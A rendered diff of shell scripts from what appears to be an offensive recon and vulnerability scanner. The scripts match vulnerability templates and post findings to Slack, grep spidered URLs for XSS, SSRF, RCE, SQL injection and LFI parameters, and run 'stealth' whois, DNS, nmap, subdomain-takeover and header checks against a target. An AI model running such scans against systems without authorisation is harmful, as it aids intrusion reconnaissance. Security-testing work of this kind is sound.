cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
else
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
done
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do
|
||||
|
|
|
|||
|
|
@ -6,27 +6,27 @@
|
|||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
else
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
done
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
|
|
|
|||
|
|
@ -26,4 +26,11 @@
|
|||
egrep "HIGH" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt
|
||||
egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt
|
||||
egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt
|
||||
egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt
|
||||
egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt
|
||||
WORKSPACE_RISK_CRITCAL=$(cat $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 2> /dev/null)
|
||||
WORKSPACE_RISK_HIGH=$(cat $LOOT_DIR/vulnerabilities/high_vulns_total.txt 2> /dev/null)
|
||||
WORKSPACE_RISK_MEDIUM=$(cat $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 2> /dev/null)
|
||||
WORKSPACE_RISK_LOW=$(cat $LOOT_DIR/vulnerabilities/low_vulns_total.txt 2> /dev/null)
|
||||
WORKSPACE_RISK_INFO=$(cat $LOOT_DIR/vulnerabilities/info_vulns_total.txt 2> /dev/null)
|
||||
WORKSPACE_RISK_TOTAL=$(($WORKSPACE_RISK_CRITCAL*5+$WORKSPACE_RISK_HIGH*4+$WORKSPACE_RISK_MEDIUM*3+$WORKSPACE_RISK_LOW*2+$WORKSPACE_RISK_INFO*1))
|
||||
echo "$WORKSPACE_RISK_TOTAL" > $LOOT_DIR/vulnerabilities/vuln_score_total.txt 2> /dev/null
|
||||
|
|
@ -0,0 +1,46 @@
|
|||
if [[ $STATIC_GREP_SEARCH ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_EXTENSIONS" | tee $LOOT_DIR/web/static-extensions-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING INTERESTING PARAMETERS STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_PARAMETERS" | tee $LOOT_DIR/web/static-parameters-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING XSS STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_XSS" | tee $LOOT_DIR/web/static-xss-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SSRF STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSRF" | tee $LOOT_DIR/web/static-ssrf-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING REDIRECT STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_REDIRECT" | tee $LOOT_DIR/web/static-redirect-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING RCE STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_RCE" | tee $LOOT_DIR/web/static-rce-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING IDOR STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_IDOR" | tee $LOOT_DIR/web/static-idor-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SQL STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SQL" | tee $LOOT_DIR/web/static-sql-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING LFI STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_LFI" | tee $LOOT_DIR/web/static-lfi-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SSTI STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSTI" | tee $LOOT_DIR/web/static-ssti-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DEBUG STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_DEBUG" | tee $LOOT_DIR/web/static-debug-$TARGET.txt | head -n $GREP_MAX_LINES
|
||||
fi
|
||||
|
|
@ -84,9 +84,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
|
||||
fi
|
||||
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
|
||||
|
|
@ -95,11 +92,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
|
|
@ -110,9 +102,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i \"wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp\" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null$RESET"
|
||||
fi
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
echo ""
|
||||
fi
|
||||
|
|
@ -123,9 +112,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN nmap -sV --open -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt$RESET"
|
||||
fi
|
||||
nmap -p $QUICK_PORTS $NMAP_OPTIONS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
|
|
@ -170,10 +156,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
|
|
